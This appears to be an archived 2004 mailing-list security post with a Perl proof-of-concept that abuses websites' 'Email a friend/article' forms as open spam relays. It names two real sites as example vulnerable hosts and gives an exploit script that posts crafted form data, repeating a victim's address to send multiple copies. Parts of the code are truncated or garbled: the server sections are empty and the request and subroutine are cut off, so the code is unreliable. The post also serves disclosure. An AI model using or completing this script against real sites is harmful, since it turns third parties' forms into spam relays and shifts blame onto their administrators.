[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Spammers can hide behind 'Email a friend/article' scripts.

# Author:      Vengy
# Email:       cyber_flash@xxxxxxxxxxx
# Description: Spammers can hide behind 'Email a friend/article' scripts.
# How it works:
# -------------
# This simple perl script will send just 3 identical fake spam messages
# to 'yourname@xxxxxxxxxxxxxx' from 'vengy@xxxxxxxxxx'. Example:
# +------------------------------------------+
# | From :     <vengy@xxxxxxxxxx>            |
# | Sent :     Friday, April 9, 2004 6:34 PM |
# | To :       <yourname@xxxxxxxxxxxxxx>     |
# | Subject :  To spam or not to spam!       |
# |                                          |
# | Urgent! Call me: 1-900-EAT-SPAM          |
# |                                          |
# | www.spammmmmm.com                        |
# +------------------------------------------+
# If a spammer or victim sends junk email directly to their ISP SMTP servers,
# network Admins can trace back the connection and deal with the problem.
# But, the 'Email a friend' technique will deflect a significant portion of
# the complaints away from spammers and towards the administrators of the 
hijacked host.
# There are possibly zillions of insecure 'Email a friend/article' on the web! 
(just google it)
# Many allow multiple unrestricted emails to be sent separated by comma's.
# (Imagine an automated harvester to compile a list of open spam servers!)
# For demonstrational purposes, here are two random servers:
# Host:                       Outgoing SMTP Server:   Email Originator:
# =====                       =====================   =================
# www.wcqp.com                relay.westlaw.com       eg-fsite-b12.ecom.tlrg.com
# edinburghnews.scotsman.com  macdui.scotsman.com     80-75-65-10.eqsn.net
# Notes: Relaying is denied (550) when connecting directly to the SMTP servers.
# However, by using email forms, the Originator has access to send messages!
# Arguments to Send_SPAM are:
# ---------------------------
# 1. Webserver.
# 2. Email script.
# 3. Host.
# 4. Content.
# 5. Email address of Victim.
# 6. Number of copies to send.

use IO::Socket::INET qw(CRLF);

my $victim       = 'yourname@xxxxxxxxxxxxxx';
my $copies       = 3;
my $sender_email = 'vengy@xxxxxxxxxx';
my $sender_name  = 'vengy';
my $subject      = 'To+spam+or+not+to+spam%21';
my $body         = 'Urgent!+Call+me:+1-900-EAT-SPAM';
my $spam_url     = 'http%3A%2F%2Fwww.spammmmmm.com'; 

################## Spam Server #1 ##################
          'friend_name='.("%2C" x 
################## Spam Server #2 ##################          

################## Spam Server #3 ##################

sub Send_SPAM {
    my ($server,$url,$host,$content,$email_to,$email_num) = @_;
    $repeat_email_to = ($email_to."%2C") x $email_num;
    substr($repeat_email_to,-3,3) = "";
    $content =~ s/$email_to/$repeat_email_to/;
    $sock = IO::Socket::INET->new(PeerAddr => $server ,PeerPort => 
'http(80)',Proto => 'tcp');
    die "$!" unless $sock;
    print $sock 'POST /'.$url.' HTTP/1.1',CRLF,
                'Host: '.$host,CRLF,
                'Content-Type: application/x-www-form-urlencoded',CRLF,
                'Content-Length: '.length($content),CRLF,
                'Connection: Keep-Alive',CRLF,
                'Cache-Control: no-cache',CRLF  x 2,
    close $sock;
    print "Sent SPAM from server: $server\n";